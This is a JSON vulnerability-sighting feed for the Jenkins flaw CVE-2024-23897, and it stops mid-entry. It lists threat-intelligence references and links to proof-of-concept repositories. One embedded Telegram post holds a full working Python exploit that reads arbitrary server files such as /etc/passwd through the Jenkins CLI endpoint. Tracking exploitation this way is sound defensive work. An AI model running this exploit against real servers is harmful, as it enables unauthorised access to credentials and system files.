{"vulnerability": "CVE-2024-23897", "sightings": [{"uuid": "dba589f4-627d-4d67-8b96-0e709f533eb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-08-19T18:10:02.000000Z"}, {"uuid": "530e59df-9ea3-40b1-9cc5-2d93fa87d18e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "MISP/0420f1c3-4b8d-4875-854e-5cb5f02408ca", "content": "", "creation_timestamp": "2024-08-21T16:29:31.000000Z"}, {"uuid": "4cdbfc6b-23e1-4a44-9a30-6101ec3131af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://infosec.exchange/users/saltmyhash/statuses/114039171548967342", "content": "", "creation_timestamp": "2025-02-21T01:01:38.512766Z"}, {"uuid": "10d38c37-4c0c-48e2-abdd-1060aa90fe88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://bsky.app/profile/opsmatters.bsky.social/post/3lhhxgigpe52i", "content": "", "creation_timestamp": "2025-02-06T01:41:57.029329Z"}, {"uuid": "45ff8b3f-ef7b-498c-a8cd-adbe31676c37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "a5038b58-6f43-4b94-9b31-0e5e10d8f657", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://bsky.app/profile/opsmatters.bsky.social/post/3lhfq3rjx7u2z", "content": "", "creation_timestamp": "2025-02-05T04:25:21.797005Z"}, {"uuid": "4941aceb-9317-4633-b48e-b9f8ba24ec76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:11:00.000000Z"}, {"uuid": "e46991d8-2f82-44b1-85ea-289196694ac8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:57.000000Z"}, {"uuid": "19239e95-d660-41c8-b822-734d156279fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:02.000000Z"}, {"uuid": "d9dee979-f1e7-4d0b-be3a-9a9522fae6d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-20)", "content": "", "creation_timestamp": "2025-04-20T00:00:00.000000Z"}, {"uuid": "4270c820-de5f-49c0-8f11-77ce805099c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://bsky.app/profile/cyberalerts.bsky.social/post/3lv6gnfxlx325", "content": "", "creation_timestamp": "2025-07-30T10:40:21.026281Z"}, {"uuid": "ecfc0e8c-7d96-4482-a544-48170b3175af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://gist.github.com/Hamid-K/f4288dae3a1f2dea8905b1cf16d59c1b", "content": "", "creation_timestamp": "2025-10-03T16:37:38.000000Z"}, {"uuid": "d3797f9f-3bcc-4b05-a731-f47c1ae9a611", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:25.000000Z"}, {"uuid": "7a6594e0-6bec-4ae5-8055-4e86440e3dfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://gist.github.com/Darkcrai86/aac3cf066ef58e236bd705c03b2f5136", "content": "", "creation_timestamp": "2025-10-17T06:43:55.000000Z"}, {"uuid": "e3be17d4-82e0-4404-acdf-7f755cc12e1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://gist.github.com/TatiShayo/5ed28b07d1673e82dfdb62fe268153bf", "content": "", "creation_timestamp": "2025-09-23T17:00:55.000000Z"}, {"uuid": "b5791870-7f29-485c-bb84-7b792aa1f5e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://bsky.app/profile/hashlytics.io/post/3m3fx6jojv32w", "content": "", "creation_timestamp": "2025-10-17T18:56:05.883694Z"}, {"uuid": "97a8848b-9d6e-42a2-bb8a-a323801f66be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb", "content": "", "creation_timestamp": "2024-03-28T20:47:57.000000Z"}, {"uuid": "e0e72f33-7c75-4478-96f1-1b51a1f0265d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:13:10.000000Z"}, {"uuid": "f15d6fad-44bb-4b93-88fe-52ee4de72a50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://gist.github.com/jonathan-gruber-1/05724c8f2229fceca85cb5694e67abbd", "content": "", "creation_timestamp": "2026-02-13T10:12:10.000000Z"}, {"uuid": "b1e34142-c646-4e60-8512-6fc5aa8b5ec7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-23897", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mb45z2itms52", "content": "", "creation_timestamp": "2025-12-29T06:03:02.708852Z"}, {"uuid": "630377b0-01b6-41ce-94b7-c7be33490ad7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3maszlojgso23", "content": "", "creation_timestamp": "2025-12-25T14:49:46.597452Z"}, {"uuid": "20b9fb56-051d-478f-99a3-dd781521f540", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-08)", "content": "", "creation_timestamp": "2026-02-08T00:00:00.000000Z"}, {"uuid": "ac86eeaf-4985-46d7-922c-2f3bd3729f13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/Logovo_Sphinxa/66", "content": "\u0422\u0443\u0442 \u044d\u0442\u043e \u0432\u0443\u043b\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0432 jenkins, rce https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html?m=1 \n\u041d\u0443 \u0438 \u044f \u043a\u043e\u0440\u043e\u0447 \u0441\u0434\u0435\u043b\u0430\u043b \u043f\u043e\u043f\u044b\u0442\u043a\u0443 \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c poc \u043f\u043e\u0434 \u0434\u0430\u043d\u043d\u0443\u044e \u0432\u0443\u043b\u043d\u0443 \nhttps://github.com/vmtyan/poc-cve-2024-23897 \n\u0412\u043e\u0442 \u043a\u0430\u043a \u0442\u043e \u0442\u0430\u043a \n#cve #vuln", "creation_timestamp": "2024-02-16T09:00:20.000000Z"}, {"uuid": "40790445-64de-4dc1-bee1-76d81d72b92a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-20)", "content": "", "creation_timestamp": "2026-03-20T00:00:00.000000Z"}, {"uuid": "6ecc7c37-5a2b-4e84-9939-2904f1079d69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "02d028d4-c2a5-46ca-94cc-8334d3a4e7d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/a123c8e0-d881-4681-aa01-7635ba448bdf", "content": "", "creation_timestamp": "2026-02-02T12:26:31.351263Z"}, {"uuid": "2c7a43d6-3ec1-4248-ab66-ba85ac0bdcdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8499", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23897 \ubd84\uc11d\nURL\uff1ahttps://github.com/ShieldAuth-PHP/PBL05-CVE-Analsys\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-09T18:45:13.000000Z"}, {"uuid": "b40232b9-fd87-4e1b-abbc-7fc69d77f550", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/D3HE0UJzaDXkbj1Vn-7PfkAGqYuP8zCVKwhuLhP2f-Hh7ek", "content": "", "creation_timestamp": "2025-09-10T21:00:04.000000Z"}, {"uuid": "61fcf75b-3598-400a-876b-646591904933", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8176", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aReproduce CVE-2024\u201323897\nURL\uff1ahttps://github.com/NoSpaceAvailable/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-06T05:31:13.000000Z"}, {"uuid": "0ad342de-e959-4219-9e6b-aba755ef2f2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/jenkins_arbitrary_file_read_cve_2024_23897", "content": "", "creation_timestamp": "2024-01-31T07:19:30.000000Z"}, {"uuid": "13f4619f-0721-4ad2-a771-6e4905962240", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/cKure/13485", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 From Limited file read to full access on Jenkins (CVE-2024-23897).\n\nhttps://xphantom.nl/posts/crypto-attack-jenkins/", "creation_timestamp": "2024-08-13T19:48:32.000000Z"}, {"uuid": "188e5d9e-19b1-4e5d-9d63-7407bebd2953", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/true_sec/53", "content": "Jenkins RCE CVE-2024-23897\n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Jenkins. \u041f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c RCE \u043d\u0430 \u0430\u0442\u0430\u043a\u0443\u0435\u043c\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u043c\u043e\u0434\u0443\u043b\u044c args4j. \n\nPoC\nimport threading\nimport http.client\nimport time\nimport uuid\nimport urllib.parse\nimport sys\n\nif len(sys.argv) != 3:\n    print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')\n    exit()\n\ndata_bytes = b'\\x00\\x00\\x00\\x06\\x00\\x00\\x04help\\x00\\x00\\x00\\x0e\\x00\\x00\\x0c@' + sys.argv[2].encode() + b'\\x00\\x00\\x00\\x05\\x02\\x00\\x03GBK\\x00\\x00\\x00\\x07\\x01\\x00\\x05zh_CN\\x00\\x00\\x00\\x00\\x03'\ntarget = urllib.parse.urlparse(sys.argv[1])\nuuid_str = str(uuid.uuid4())\n\nprint(f'REQ: {data_bytes}\\n')\n\ndef req1():\n    conn = http.client.HTTPConnection(target.netloc)\n    conn.request(\"POST\", \"/cli?remoting=false\", headers={\n        \"Session\": uuid_str,\n        \"Side\": \"download\"\n    })\n    print(f'RESPONSE: {conn.getresponse().read()}')\n\ndef req2():\n    conn = http.client.HTTPConnection(target.netloc)\n    conn.request(\"POST\", \"/cli?remoting=false\", headers={\n        \"Session\": uuid_str,\n        \"Side\": \"upload\",\n        \"Content-type\": \"application/octet-stream\"\n    }, body=data_bytes)\n\nt1 = threading.Thread(target=req1)\nt2 = threading.Thread(target=req2)\n\nt1.start()\ntime.sleep(0.1)\nt2.start()\n\nt1.join()\nt2.join()\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435: \npython poc.py http://127.0.0.1:8888/ [/etc/passwd]\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2024-01-26T09:47:02.000000Z"}, {"uuid": "ad0eccdd-859c-4736-a13e-621d1b462c88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9686", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aJenkins CVE-2024-23897 POC : Arbitrary File Read Vulnerability Leading to RCE\nURL\uff1ahttps://github.com/Marouane133/jenkins-lfi\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2025-01-02T03:30:16.000000Z"}, {"uuid": "19184293-9db0-4ca8-baa0-cb856829b676", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8448", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aAutomated PHP remote code execution scanner for CVE-2024-4577\nURL\uff1ahttps://github.com/BinaryGoodBoy0101/Jenkins-Exploit-CVE-2024-23897-Fsociety\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-09-03T16:07:40.000000Z"}, {"uuid": "b87a4097-c379-46a4-8604-99094afb2014", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/14837", "content": "CVE-2024\u201323897\u200a\u2014\u200aJenkins File Read Vulnerability\u200a\u2014\u200aPOC: https://medium.com/@verylazytech/cve-2024-23897-jenkins-file-read-vulnerability-poc-6a1dfdbfd6f2?source=rss------bug_bounty-5", "creation_timestamp": "2024-10-01T09:01:58.000000Z"}, {"uuid": "7a75b7c2-e733-4303-a81e-93a71b38c9c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/true_sec/54", "content": "Poc github: https://github.com/binganao/CVE-2024-23897", "creation_timestamp": "2024-01-26T10:19:18.000000Z"}, {"uuid": "51abdff2-7f8e-4662-9813-466ab9673b9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6535", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPoC for CVE-2024-23897\nURL\uff1ahttps://github.com/AbraXa5/Jenkins-CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-01T03:19:07.000000Z"}, {"uuid": "fdb54066-99ae-40ae-b063-8bbcdb335745", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6612", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC for CVE-2024-23897 Jenkins File-Read \nURL\uff1ahttps://github.com/godylockz/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-16T07:21:29.000000Z"}, {"uuid": "aa3b5774-804a-44db-bc0d-e264ddd1a6a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6525", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aArbitrary file read vulnerability through the CLI can lead to RCE\nURL\uff1ahttps://github.com/viszsec/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-01-29T04:44:48.000000Z"}, {"uuid": "85f8191b-cccd-43cd-8151-8639b0c90c93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6522", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23897\nURL\uff1ahttps://github.com/raheel0x01/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-01-28T12:54:42.000000Z"}, {"uuid": "18a507a9-7dc2-43a8-b471-eae9b84aa7ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/hackingbra/94", "content": "Jenkins CVE-2024-23897\n\nhttps://habr.com/ru/articles/797175/", "creation_timestamp": "2024-02-29T13:34:18.000000Z"}, {"uuid": "bad379d4-414f-4be4-a84f-2f5dcfcc1d8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7318", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPoc para explotar la vulnerabilidad CVE-2024-23897 en versiones 2.441 y anteriores de Jenkins, mediante la cual podremos leer archivos internos del sistema sin estar autenticados\nURL\uff1ahttps://github.com/Maalfer/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-16T09:52:12.000000Z"}, {"uuid": "bf52d3f2-cb1f-4c72-bdaa-a3a74d76daa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8871", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23897 exploit script\nURL\uff1ahttps://github.com/cc3305/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-28T21:19:31.000000Z"}, {"uuid": "18c205c1-a19a-4aa3-807f-e037164643a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8909", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23897\u662f\u4e00\u4e2a\u5f71\u54cdJenkins\u7684\u4e25\u91cd\u5b89\u5168\u6f0f\u6d1e\nURL\uff1ahttps://github.com/zgimszhd61/CVE-2024-23897-poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-01T01:18:39.000000Z"}, {"uuid": "ef7c80b9-39b7-41de-a2b0-a9774adf2c67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6624", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPerform with massive Jenkins Reading-2-RCE\nURL\uff1ahttps://github.com/ThatNotEasy/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-19T02:34:30.000000Z"}, {"uuid": "d567ab09-23a3-4cd1-9e59-55df7340d707", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6615", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aJenkins Arbitrary File Leak Vulnerability [CVE-2024-23897]\nURL\uff1ahttps://github.com/ifconfig-me/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-16T23:26:19.000000Z"}, {"uuid": "8aba96ea-4e4a-4232-9e3a-ffa6b76687db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8988", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aJenkins CVE-2024-23897: Arbitrary File Read Vulnerability Leading to RCE\nURL\uff1ahttps://github.com/safeer-accuknox/Jenkins-Args4j-CVE-2024-23897-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-11T01:44:49.000000Z"}, {"uuid": "8578e204-6ba6-4752-b3ed-a5ce8a8fed9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6490", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23897 (CVSS 9.8): Critical Jenkins Security Vulnerability, RCE POC \nURL\uff1ahttps://github.com/forsaken0127/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-01-25T08:44:45.000000Z"}, {"uuid": "3679bb42-566c-47f5-9b21-1a7d85605561", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6516", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aon this git you can find all information on the CVE-2024-23897\nURL\uff1ahttps://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-01-27T15:04:38.000000Z"}, {"uuid": "4da84259-017c-4c4e-bfff-86a1d86d8837", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6643", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aUn script realizado en python para atumatizar la vulnerabilidad CVE-2024-23897 